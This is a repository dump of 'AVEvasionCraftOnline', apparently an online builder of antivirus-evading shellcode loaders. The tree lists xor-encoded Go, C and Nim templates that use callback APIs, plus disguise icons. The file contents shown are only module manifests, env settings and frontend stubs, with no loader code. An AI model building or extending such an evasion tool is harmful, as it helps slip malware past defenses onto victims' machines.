├── template ├── go │ ├── go_FlsAlloc │ │ ├── xor │ │ │ ├── LOCAL │ │ │ │ ├── go.mod │ │ │ │ └── go_FlsAlloc.go │ │ │ ├── EMBEDDED │ │ │ │ ├── go.mod │ │ │ │ └── go_FlsAlloc.go │ │ │ └── REMOTE │ │ │ │ ├── go.mod │ │ │ │ ├── go.sum │ │ │ │ └── go_FlsAlloc.go │ │ └── base64Xor │ │ │ ├── EMBEDDED │ │ │ ├── go.mod │ │ │ └── go_FlsAlloc.go │ │ │ ├── LOCAL │ │ │ ├── go.mod │ │ │ └── go_FlsAlloc.go │ │ │ └── REMOTE │ │ │ ├── go.mod │ │ │ ├── go.sum │ │ │ └── go_FlsAlloc.go │ ├── go_SetTimer │ │ ├── xor │ │ │ ├── LOCAL │ │ │ │ ├── go.mod │ │ │ │ └── go_SetTimer.go │ │ │ ├── EMBEDDED │ │ │ │ ├── go.mod │ │ │ │ └── go_SetTimer.go │ │ │ └── REMOTE │ │ │ │ ├── go.mod │ │ │ │ ├── go.sum │ │ │ │ └── go_SetTimer.go │ │ └── base64Xor │ │ │ ├── EMBEDDED │ │ │ ├── go.mod │ │ │ └── go_SetTimer.go │ │ │ ├── LOCAL │ │ │ ├── go.mod │ │ │ └── go_SetTimer.go │ │ │ └── REMOTE │ │ │ ├── go.mod │ │ │ ├── go.sum │ │ │ └── go_SetTimer.go │ ├── go_EnumFontsW │ │ ├── xor │ │ │ ├── EMBEDDED │ │ │ │ ├── go.mod │ │ │ │ └── go_EnumFontsW.go │ │ │ ├── LOCAL │ │ │ │ ├── go.mod │ │ │ │ └── go_EnumFontsW.go │ │ │ └── REMOTE │ │ │ │ ├── go.mod │ │ │ │ ├── go.sum │ │ │ │ └── go_EnumFontsW.go │ │ └── base64Xor │ │ │ ├── LOCAL │ │ │ ├── go.mod │ │ │ └── go_EnumFontsW.go │ │ │ ├── EMBEDDED │ │ │ ├── go.mod │ │ │ └── go_EnumFontsW.go │ │ │ └── REMOTE │ │ │ ├── go.mod │ │ │ ├── go.sum │ │ │ └── go_EnumFontsW.go │ ├── go_EnumChildWindows │ │ ├── xor │ │ │ ├── LOCAL │ │ │ │ ├── go.mod │ │ │ │ └── go_EnumChildWindows.go │ │ │ ├── EMBEDDED │ │ │ │ ├── go.mod │ │ │ │ └── go_EnumChildWindows.go │ │ │ └── REMOTE │ │ │ │ ├── go.mod │ │ │ │ ├── go.sum │ │ │ │ └── go_EnumChildWindows.go │ │ └── base64Xor │ │ │ ├── LOCAL │ │ │ ├── go.mod │ │ │ └── go_EnumChildWindows.go │ │ │ ├── EMBEDDED │ │ │ ├── go.mod │ │ │ └── go_EnumChildWindows.go │ │ │ └── REMOTE │ │ │ ├── go.mod │ │ │ ├── go.sum │ │ │ └── go_EnumChildWindows.go │ ├── go_FiberContextEdit │ │ ├── xor │ │ │ ├── LOCAL │ │ │ │ ├── go.mod │ │ │ │ └── 
go_FiberContextEdit.go │ │ │ ├── EMBEDDED │ │ │ │ ├── go.mod │ │ │ │ └── go_FiberContextEdit.go │ │ │ └── REMOTE │ │ │ │ ├── go.mod │ │ │ │ ├── go.sum │ │ │ │ └── go_FiberContextEdit.go │ │ └── base64Xor │ │ │ ├── LOCAL │ │ │ ├── go.mod │ │ │ └── go_FiberContextEdit.go │ │ │ ├── EMBEDDED │ │ │ ├── go.mod │ │ │ └── go_FiberContextEdit.go │ │ │ └── REMOTE │ │ │ ├── go.mod │ │ │ ├── go.sum │ │ │ └── go_FiberContextEdit.go │ ├── go_SymEnumProcesses │ │ ├── xor │ │ │ ├── LOCAL │ │ │ │ ├── go.mod │ │ │ │ └── go_SymEnumProcesses.go │ │ │ ├── EMBEDDED │ │ │ │ ├── go.mod │ │ │ │ └── go_SymEnumProcesses.go │ │ │ └── REMOTE │ │ │ │ ├── go.mod │ │ │ │ ├── go.sum │ │ │ │ └── go_SymEnumProcesses.go │ │ └── base64Xor │ │ │ ├── LOCAL │ │ │ ├── go.mod │ │ │ └── go_SymEnumProcesses.go │ │ │ ├── EMBEDDED │ │ │ ├── go.mod │ │ │ └── go_SymEnumProcesses.go │ │ │ └── REMOTE │ │ │ ├── go.mod │ │ │ ├── go.sum │ │ │ └── go_SymEnumProcesses.go │ ├── go_EnumResourceTypesExW │ │ ├── xor │ │ │ ├── EMBEDDED │ │ │ │ ├── go.mod │ │ │ │ └── go_EnumResourceTypesExW.go │ │ │ ├── LOCAL │ │ │ │ ├── go.mod │ │ │ │ └── go_EnumResourceTypesExW.go │ │ │ └── REMOTE │ │ │ │ ├── go.mod │ │ │ │ ├── go.sum │ │ │ │ └── go_EnumResourceTypesExW.go │ │ └── base64Xor │ │ │ ├── LOCAL │ │ │ ├── go.mod │ │ │ └── go_EnumResourceTypesExW.go │ │ │ ├── EMBEDDED │ │ │ ├── go.mod │ │ │ └── go_EnumResourceTypesExW.go │ │ │ └── REMOTE │ │ │ ├── go.mod │ │ │ ├── go.sum │ │ │ └── go_EnumResourceTypesExW.go │ ├── go_CertEnumSystemStore │ │ ├── xor │ │ │ ├── LOCAL │ │ │ │ ├── go.mod │ │ │ │ └── go_CertEnumSystemStore.go │ │ │ ├── EMBEDDED │ │ │ │ ├── go.mod │ │ │ │ └── go_CertEnumSystemStore.go │ │ │ └── REMOTE │ │ │ │ ├── go.mod │ │ │ │ └── go_CertEnumSystemStore.go │ │ └── base64Xor │ │ │ ├── LOCAL │ │ │ ├── go.mod │ │ │ └── go_CertEnumSystemStore.go │ │ │ ├── EMBEDDED │ │ │ ├── go.mod │ │ │ └── go_CertEnumSystemStore.go │ │ │ └── REMOTE │ │ │ ├── go.mod │ │ │ └── go_CertEnumSystemStore.go │ └── go_VirtualAlloc │ │ ├── xor │ │ 
├── EMBEDDED │ │ │ ├── go.mod │ │ │ ├── go.sum │ │ │ └── go_VirtualAlloc.go │ │ ├── LOCAL │ │ │ ├── go.mod │ │ │ ├── go.sum │ │ │ └── go_VirtualAlloc.go │ │ └── REMOTE │ │ │ ├── go.mod │ │ │ ├── go.sum │ │ │ └── go_VirtualAlloc.go │ │ └── base64Xor │ │ ├── EMBEDDED │ │ ├── go.mod │ │ ├── go.sum │ │ └── go_VirtualAlloc.go │ │ ├── LOCAL │ │ ├── go.mod │ │ ├── go.sum │ │ └── go_VirtualAlloc.go │ │ └── REMOTE │ │ ├── go.mod │ │ ├── go.sum │ │ └── go_VirtualAlloc.go ├── icon │ ├── cs2.ico.o │ ├── clash.ico.o │ ├── logo.ico.o │ └── officeplus.ico.o ├── c │ └── c_VirtualAlloc │ │ └── none │ │ └── c_VirtualAlloc.c └── nim │ └── nim_VirtualAlloc │ └── xor │ ├── LOCAL │ └── nim_VirtualAlloc.nim │ └── EMBEDDED │ └── nim_VirtualAlloc.nim ├── images ├── 012.png ├── 013.png ├── image-20240124190806863.png ├── image-20240131132406380.png ├── 1f1fcd7d8144ac62d2431f09f70e5d6f.png ├── 30a135832100b1f991bf0667c9c7acf9.png ├── 54f5d229cdb4bd95e963b7c300994511.png └── 9db0f1cafb5eaa819a0f2a86352876fb.png ├── AVEvasionCraftOnline-Frontend ├── .vscode │ └── extensions.json ├── public │ └── logo.ico ├── src │ ├── views │ │ └── AboutView.vue │ ├── assets │ │ ├── logo.png │ │ ├── logo1.png │ │ └── vue.svg │ ├── store │ │ └── index.js │ ├── api │ │ ├── table.js │ │ ├── compile.js │ │ └── user.js │ ├── utils │ │ ├── auth.js │ │ └── request.js │ ├── components │ │ ├── HelloWorld.vue │ │ └── ProcessValueLookup.vue │ ├── main.js │ ├── router │ │ └── index.js │ ├── style-dark.css │ ├── style.css │ └── App.vue ├── .prettierrc.json ├── .env.production ├── .env.development ├── .gitignore ├── index.html ├── .eslintrc.cjs ├── README.md ├── package.json └── vite.config.js ├── AVEvasionCraftOnline-Backend ├── .mvn │ └── wrapper │ │ ├── maven-wrapper.jar │ │ └── maven-wrapper.properties ├── src │ ├── main │ │ ├── java │ │ │ └── com │ │ │ │ └── yutian4060 │ │ │ │ └── avevasioncraftonline │ │ │ │ ├── dto │ │ │ │ ├── CompilationResponseDTO.java │ │ │ │ └── ShellcodeUploadDTO.java │ │ │ │ ├── 
AvEvasionCraftOnlineApplication.java │ │ │ │ ├── service │ │ │ │ └── CompileService.java │ │ │ │ ├── controller │ │ │ │ ├── BypassAVConfigController.java │ │ │ │ └── CompilerController.java │ │ │ │ ├── config │ │ │ │ └── BypassAVConfigProperties.java │ │ │ │ ├── enums │ │ │ │ └── Result.java │ │ │ │ └── utils │ │ │ │ ├── ShellcodeProcessor.java │ │ │ │ ├── TextFileProcessor.java │ │ │ │ ├── CompilerCode.java │ │ │ │ └── FileUtils.java │ │ └── resources │ │ │ └── application.yaml │ └── test │ │ └── java │ │ └── com │ │ └── yutian4060 │ │ └── avevasioncraftonline │ │ └── utils │ │ ├── ShellcodeProcessorTest.java │ │ ├── CompilerCodeTest.java │ │ ├── FileUtilsTest.java │ │ └── TextFileProcessorTest.java ├── .gitignore └── pom.xml ├── LICENSE ├── README.md └── application.yaml /template/go/go_FlsAlloc/xor/LOCAL/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /template/go/go_SetTimer/xor/LOCAL/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /template/go/go_EnumFontsW/xor/EMBEDDED/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /template/go/go_EnumFontsW/xor/LOCAL/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /template/go/go_FlsAlloc/xor/EMBEDDED/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- 
/template/go/go_SetTimer/xor/EMBEDDED/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /template/go/go_EnumChildWindows/xor/LOCAL/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /template/go/go_EnumFontsW/base64Xor/LOCAL/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /template/go/go_FiberContextEdit/xor/LOCAL/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /template/go/go_FlsAlloc/base64Xor/EMBEDDED/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /template/go/go_FlsAlloc/base64Xor/LOCAL/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /template/go/go_SetTimer/base64Xor/EMBEDDED/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /template/go/go_SetTimer/base64Xor/LOCAL/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- 
/template/go/go_SymEnumProcesses/xor/LOCAL/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /template/go/go_EnumChildWindows/base64Xor/LOCAL/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /template/go/go_EnumChildWindows/xor/EMBEDDED/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /template/go/go_EnumFontsW/base64Xor/EMBEDDED/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /template/go/go_EnumResourceTypesExW/xor/EMBEDDED/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /template/go/go_EnumResourceTypesExW/xor/LOCAL/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /template/go/go_FiberContextEdit/base64Xor/LOCAL/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /template/go/go_FiberContextEdit/xor/EMBEDDED/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | 
-------------------------------------------------------------------------------- /template/go/go_SymEnumProcesses/base64Xor/LOCAL/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /template/go/go_SymEnumProcesses/xor/EMBEDDED/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /template/go/go_EnumChildWindows/base64Xor/EMBEDDED/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /template/go/go_EnumResourceTypesExW/base64Xor/LOCAL/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /template/go/go_FiberContextEdit/base64Xor/EMBEDDED/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /template/go/go_SymEnumProcesses/base64Xor/EMBEDDED/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /images/012.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yutianqaq/AVEvasionCraftOnline/HEAD/images/012.png -------------------------------------------------------------------------------- /images/013.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/yutianqaq/AVEvasionCraftOnline/HEAD/images/013.png -------------------------------------------------------------------------------- /template/go/go_EnumResourceTypesExW/base64Xor/EMBEDDED/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/.vscode/extensions.json: -------------------------------------------------------------------------------- 1 | { 2 | "recommendations": ["Vue.volar"] 3 | } 4 | -------------------------------------------------------------------------------- /template/icon/cs2.ico.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yutianqaq/AVEvasionCraftOnline/HEAD/template/icon/cs2.ico.o -------------------------------------------------------------------------------- /template/icon/clash.ico.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yutianqaq/AVEvasionCraftOnline/HEAD/template/icon/clash.ico.o -------------------------------------------------------------------------------- /template/icon/logo.ico.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yutianqaq/AVEvasionCraftOnline/HEAD/template/icon/logo.ico.o -------------------------------------------------------------------------------- /template/go/go_CertEnumSystemStore/xor/LOCAL/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | 5 | require golang.org/x/sys v0.20.0 6 | -------------------------------------------------------------------------------- /template/icon/officeplus.ico.o: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/yutianqaq/AVEvasionCraftOnline/HEAD/template/icon/officeplus.ico.o -------------------------------------------------------------------------------- /template/go/go_CertEnumSystemStore/base64Xor/LOCAL/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | 5 | require golang.org/x/sys v0.20.0 6 | -------------------------------------------------------------------------------- /template/go/go_CertEnumSystemStore/xor/EMBEDDED/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | 5 | require golang.org/x/sys v0.20.0 6 | -------------------------------------------------------------------------------- /template/go/go_VirtualAlloc/xor/EMBEDDED/go.mod: -------------------------------------------------------------------------------- 1 | module 1 2 | 3 | go 1.18 4 | 5 | require golang.org/x/sys v0.16.0 // indirect 6 | -------------------------------------------------------------------------------- /template/go/go_VirtualAlloc/xor/LOCAL/go.mod: -------------------------------------------------------------------------------- 1 | module 1 2 | 3 | go 1.21.6 4 | 5 | require golang.org/x/sys v0.16.0 // indirect 6 | -------------------------------------------------------------------------------- /images/image-20240124190806863.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yutianqaq/AVEvasionCraftOnline/HEAD/images/image-20240124190806863.png -------------------------------------------------------------------------------- /images/image-20240131132406380.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yutianqaq/AVEvasionCraftOnline/HEAD/images/image-20240131132406380.png -------------------------------------------------------------------------------- 
/template/go/go_CertEnumSystemStore/base64Xor/EMBEDDED/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | 5 | require golang.org/x/sys v0.20.0 6 | -------------------------------------------------------------------------------- /template/go/go_VirtualAlloc/base64Xor/EMBEDDED/go.mod: -------------------------------------------------------------------------------- 1 | module 1 2 | 3 | go 1.18 4 | 5 | require golang.org/x/sys v0.16.0 // indirect 6 | -------------------------------------------------------------------------------- /template/go/go_VirtualAlloc/base64Xor/LOCAL/go.mod: -------------------------------------------------------------------------------- 1 | module 1 2 | 3 | go 1.21.6 4 | 5 | require golang.org/x/sys v0.16.0 // indirect 6 | -------------------------------------------------------------------------------- /images/1f1fcd7d8144ac62d2431f09f70e5d6f.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yutianqaq/AVEvasionCraftOnline/HEAD/images/1f1fcd7d8144ac62d2431f09f70e5d6f.png -------------------------------------------------------------------------------- /images/30a135832100b1f991bf0667c9c7acf9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yutianqaq/AVEvasionCraftOnline/HEAD/images/30a135832100b1f991bf0667c9c7acf9.png -------------------------------------------------------------------------------- /images/54f5d229cdb4bd95e963b7c300994511.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yutianqaq/AVEvasionCraftOnline/HEAD/images/54f5d229cdb4bd95e963b7c300994511.png -------------------------------------------------------------------------------- /images/9db0f1cafb5eaa819a0f2a86352876fb.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/yutianqaq/AVEvasionCraftOnline/HEAD/images/9db0f1cafb5eaa819a0f2a86352876fb.png -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/public/logo.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yutianqaq/AVEvasionCraftOnline/HEAD/AVEvasionCraftOnline-Frontend/public/logo.ico -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/src/views/AboutView.vue: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/src/assets/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yutianqaq/AVEvasionCraftOnline/HEAD/AVEvasionCraftOnline-Frontend/src/assets/logo.png -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/src/assets/logo1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yutianqaq/AVEvasionCraftOnline/HEAD/AVEvasionCraftOnline-Frontend/src/assets/logo1.png -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Backend/.mvn/wrapper/maven-wrapper.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yutianqaq/AVEvasionCraftOnline/HEAD/AVEvasionCraftOnline-Backend/.mvn/wrapper/maven-wrapper.jar -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/.prettierrc.json: -------------------------------------------------------------------------------- 1 | { 2 | "semi": 
false, 3 | "singleQuote": true, 4 | "printWidth": 80, 5 | "trailingComma": "none", 6 | "arrowParens": "avoid" 7 | } 8 | -------------------------------------------------------------------------------- /template/go/go_VirtualAlloc/xor/EMBEDDED/go.sum: -------------------------------------------------------------------------------- 1 | golang.org/x/sys v0.16.0 h1:xWw16ngr6ZMtmxDyKyIgsE93KNKz5HKmMa3b8ALHidU= 2 | golang.org/x/sys v0.16.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA= 3 | -------------------------------------------------------------------------------- /template/go/go_VirtualAlloc/xor/LOCAL/go.sum: -------------------------------------------------------------------------------- 1 | golang.org/x/sys v0.16.0 h1:xWw16ngr6ZMtmxDyKyIgsE93KNKz5HKmMa3b8ALHidU= 2 | golang.org/x/sys v0.16.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA= 3 | -------------------------------------------------------------------------------- /template/go/go_VirtualAlloc/base64Xor/LOCAL/go.sum: -------------------------------------------------------------------------------- 1 | golang.org/x/sys v0.16.0 h1:xWw16ngr6ZMtmxDyKyIgsE93KNKz5HKmMa3b8ALHidU= 2 | golang.org/x/sys v0.16.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA= 3 | -------------------------------------------------------------------------------- /template/go/go_VirtualAlloc/base64Xor/EMBEDDED/go.sum: -------------------------------------------------------------------------------- 1 | golang.org/x/sys v0.16.0 h1:xWw16ngr6ZMtmxDyKyIgsE93KNKz5HKmMa3b8ALHidU= 2 | golang.org/x/sys v0.16.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA= 3 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/.env.production: -------------------------------------------------------------------------------- 1 | # 线上环境 2 | NODE_ENV = 'production' 3 | 4 | # 暴露必须以VITE开头才能被Vite识别 5 | 6 | VITE_BASE_API = '/' 7 | 8 | # 线上环境接口地址 9 | VITE_API_URL = 
'http://192.168.99.111:8080/' 10 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/src/store/index.js: -------------------------------------------------------------------------------- 1 | import { createStore } from 'vuex' 2 | 3 | export default createStore({ 4 | state: {}, 5 | getters: {}, 6 | mutations: {}, 7 | actions: {}, 8 | modules: {} 9 | }) 10 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/.env.development: -------------------------------------------------------------------------------- 1 | # 本地环境 2 | NODE_ENV = 'development' 3 | 4 | # 暴露必须以VITE开头才能被Vite识别 5 | 6 | VITE_BASE_API = '/dev-api' 7 | 8 | # 本地环境接口地址 9 | VITE_API_URL = 'http://127.0.0.1:8080/' 10 | # 与后台在同一局域网，这个是他电脑的 ip（dotenv 注释必须以 # 开头） 11 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/src/api/table.js: -------------------------------------------------------------------------------- 1 | import request from '@/utils/request' 2 | 3 | export function getList(params) { 4 | return request({ 5 | url: '/vue-admin-template/table/list', 6 | method: 'get', 7 | params 8 | }) 9 | } 10 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Backend/.mvn/wrapper/maven-wrapper.properties: -------------------------------------------------------------------------------- 1 | distributionUrl=https://repo.maven.apache.org/maven2/org/apache/maven/apache-maven/3.9.5/apache-maven-3.9.5-bin.zip 2 | wrapperUrl=https://repo.maven.apache.org/maven2/org/apache/maven/wrapper/maven-wrapper/3.2.0/maven-wrapper-3.2.0.jar 3 | -------------------------------------------------------------------------------- /template/go/go_EnumFontsW/xor/REMOTE/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | 5 | require github.com/valyala/fasthttp 
v1.52.0 6 | 7 | require ( 8 | github.com/andybalholm/brotli v1.1.0 // indirect 9 | github.com/klauspost/compress v1.17.6 // indirect 10 | github.com/valyala/bytebufferpool v1.0.0 // indirect 11 | ) 12 | -------------------------------------------------------------------------------- /template/go/go_FlsAlloc/xor/REMOTE/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | 5 | require github.com/valyala/fasthttp v1.52.0 6 | 7 | require ( 8 | github.com/andybalholm/brotli v1.1.0 // indirect 9 | github.com/klauspost/compress v1.17.6 // indirect 10 | github.com/valyala/bytebufferpool v1.0.0 // indirect 11 | ) 12 | -------------------------------------------------------------------------------- /template/go/go_SetTimer/xor/REMOTE/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | 5 | require github.com/valyala/fasthttp v1.52.0 6 | 7 | require ( 8 | github.com/andybalholm/brotli v1.1.0 // indirect 9 | github.com/klauspost/compress v1.17.6 // indirect 10 | github.com/valyala/bytebufferpool v1.0.0 // indirect 11 | ) 12 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Backend/src/main/java/com/yutian4060/avevasioncraftonline/dto/CompilationResponseDTO.java: -------------------------------------------------------------------------------- 1 | package com.yutian4060.avevasioncraftonline.dto; 2 | 3 | import lombok.*; 4 | 5 | @Getter 6 | @Setter 7 | @AllArgsConstructor 8 | public class CompilationResponseDTO { 9 | private String downloadLink; 10 | } 11 | -------------------------------------------------------------------------------- /template/go/go_FlsAlloc/base64Xor/REMOTE/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | 5 | require github.com/valyala/fasthttp v1.52.0 6 | 7 | require ( 8 | 
github.com/andybalholm/brotli v1.1.0 // indirect 9 | github.com/klauspost/compress v1.17.6 // indirect 10 | github.com/valyala/bytebufferpool v1.0.0 // indirect 11 | ) 12 | -------------------------------------------------------------------------------- /template/go/go_SetTimer/base64Xor/REMOTE/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | 5 | require github.com/valyala/fasthttp v1.52.0 6 | 7 | require ( 8 | github.com/andybalholm/brotli v1.1.0 // indirect 9 | github.com/klauspost/compress v1.17.6 // indirect 10 | github.com/valyala/bytebufferpool v1.0.0 // indirect 11 | ) 12 | -------------------------------------------------------------------------------- /template/go/go_EnumChildWindows/xor/REMOTE/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | 5 | require github.com/valyala/fasthttp v1.52.0 6 | 7 | require ( 8 | github.com/andybalholm/brotli v1.1.0 // indirect 9 | github.com/klauspost/compress v1.17.6 // indirect 10 | github.com/valyala/bytebufferpool v1.0.0 // indirect 11 | ) 12 | -------------------------------------------------------------------------------- /template/go/go_EnumFontsW/base64Xor/REMOTE/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | 5 | require github.com/valyala/fasthttp v1.52.0 6 | 7 | require ( 8 | github.com/andybalholm/brotli v1.1.0 // indirect 9 | github.com/klauspost/compress v1.17.6 // indirect 10 | github.com/valyala/bytebufferpool v1.0.0 // indirect 11 | ) 12 | -------------------------------------------------------------------------------- /template/go/go_EnumResourceTypesExW/xor/REMOTE/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | 5 | require github.com/valyala/fasthttp v1.52.0 6 | 7 | require ( 8 | 
github.com/andybalholm/brotli v1.1.0 // indirect 9 | github.com/klauspost/compress v1.17.6 // indirect 10 | github.com/valyala/bytebufferpool v1.0.0 // indirect 11 | ) 12 | -------------------------------------------------------------------------------- /template/go/go_FiberContextEdit/xor/REMOTE/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | 5 | require github.com/valyala/fasthttp v1.52.0 6 | 7 | require ( 8 | github.com/andybalholm/brotli v1.1.0 // indirect 9 | github.com/klauspost/compress v1.17.6 // indirect 10 | github.com/valyala/bytebufferpool v1.0.0 // indirect 11 | ) 12 | -------------------------------------------------------------------------------- /template/go/go_SymEnumProcesses/xor/REMOTE/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | 5 | require github.com/valyala/fasthttp v1.52.0 6 | 7 | require ( 8 | github.com/andybalholm/brotli v1.1.0 // indirect 9 | github.com/klauspost/compress v1.17.6 // indirect 10 | github.com/valyala/bytebufferpool v1.0.0 // indirect 11 | ) 12 | -------------------------------------------------------------------------------- /template/go/go_EnumChildWindows/base64Xor/REMOTE/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | 5 | require github.com/valyala/fasthttp v1.52.0 6 | 7 | require ( 8 | github.com/andybalholm/brotli v1.1.0 // indirect 9 | github.com/klauspost/compress v1.17.6 // indirect 10 | github.com/valyala/bytebufferpool v1.0.0 // indirect 11 | ) 12 | -------------------------------------------------------------------------------- /template/go/go_FiberContextEdit/base64Xor/REMOTE/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | 5 | require github.com/valyala/fasthttp v1.52.0 6 | 7 | require ( 8 | 
github.com/andybalholm/brotli v1.1.0 // indirect 9 | github.com/klauspost/compress v1.17.6 // indirect 10 | github.com/valyala/bytebufferpool v1.0.0 // indirect 11 | ) 12 | -------------------------------------------------------------------------------- /template/go/go_SymEnumProcesses/base64Xor/REMOTE/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | 5 | require github.com/valyala/fasthttp v1.52.0 6 | 7 | require ( 8 | github.com/andybalholm/brotli v1.1.0 // indirect 9 | github.com/klauspost/compress v1.17.6 // indirect 10 | github.com/valyala/bytebufferpool v1.0.0 // indirect 11 | ) 12 | -------------------------------------------------------------------------------- /template/go/go_EnumResourceTypesExW/base64Xor/REMOTE/go.mod: -------------------------------------------------------------------------------- 1 | module YT 2 | 3 | go 1.21.6 4 | 5 | require github.com/valyala/fasthttp v1.52.0 6 | 7 | require ( 8 | github.com/andybalholm/brotli v1.1.0 // indirect 9 | github.com/klauspost/compress v1.17.6 // indirect 10 | github.com/valyala/bytebufferpool v1.0.0 // indirect 11 | ) 12 | -------------------------------------------------------------------------------- 